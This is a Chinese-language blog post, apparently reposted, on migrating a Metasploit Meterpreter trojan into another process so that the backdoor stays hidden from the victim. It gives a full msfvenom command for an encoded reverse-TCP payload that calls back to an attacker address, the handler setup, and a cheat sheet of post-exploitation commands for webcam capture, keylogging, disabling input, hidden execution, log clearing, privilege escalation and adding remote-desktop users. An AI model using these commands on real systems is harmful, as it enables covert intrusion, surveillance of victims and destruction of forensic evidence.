zoukankan      html  css  js  c++  java
  • msf转移木马进程

    在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。

    首先我们生成一个木马

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘x00’lhost=192.168.232.195 lport=55555 -f exe > haya.exe

    启动msfconsole并设置参数

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.232.195
    set LPORT 5555
    exploit

    运行软件,成功获得shell

    转移进程

    首先命令ps查看当前windows下运行的进程有哪些。

     
    这时,我们要记录下要转移程序的pid
    比如,我想我木马的进程转移到txt文档程序下。执行下面命令。

    migrate 6296

    uictl开关键盘/鼠标
    uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
    uictl disable mouse  #禁用鼠标
    uictl disable keyboard  #禁用键盘
    
    网络摄像头摄像头命令
    webcam_list  #查看摄像头
    webcam_snap   #通过摄像头拍照
    webcam_stream   #通过摄像头开启视频
    
    执行执行文件
    execute #在目标机中执行文件
    execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
    
    迁移进程迁移
    getpid    # 获取当前进程的pid
    ps   # 查看当前活跃进程
    migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中
    kill <pid值>   #杀死进程
    
    清除日志
    clearav  #清除windows中的应用程序日志、系统日志、安全日志
    
    getsystem提权
    getsystem
    
    远程桌面及截屏
    enumdesktops  #查看可用的桌面
    getdesktop    #获取当前meterpreter 关联的桌面
    set_desktop   #设置meterpreter关联的桌面  -h查看帮助
    screenshot  #截屏
    use espia  #或者使用espia模块截屏  然后输入screengrab
    run vnc  #使用vnc远程桌面连接
    
    getgui命令
    run getgui –h #查看帮助
    run getgui -e #开启远程桌面
    run getgui -u lltest2 -p 123456   #添加用户
    run getgui -f 6661 –e   #3389端口转发到6661
    
    键盘记录
    keyscan_start  #开始键盘记录
    keyscan_dump   #导出记录数据
    keyscan_stop #结束键盘记录

    转载:https://mp.weixin.qq.com/s/JPAJjAxr1qrW6FcKt1rxeQ

  • 相关阅读:
    PNG文件格式具体解释
    opencv2对读书笔记——使用均值漂移算法查找物体
    Jackson的Json转换
    Java实现 蓝桥杯VIP 算法训练 装箱问题
    Java实现 蓝桥杯VIP 算法训练 装箱问题
    Java实现 蓝桥杯VIP 算法训练 单词接龙
    Java实现 蓝桥杯VIP 算法训练 单词接龙
    Java实现 蓝桥杯VIP 算法训练 方格取数
    Java实现 蓝桥杯VIP 算法训练 方格取数
    Java实现 蓝桥杯VIP 算法训练 单词接龙
  • 原文地址:https://www.cnblogs.com/thespace/p/12536900.html
Copyright © 2011-2022 走看看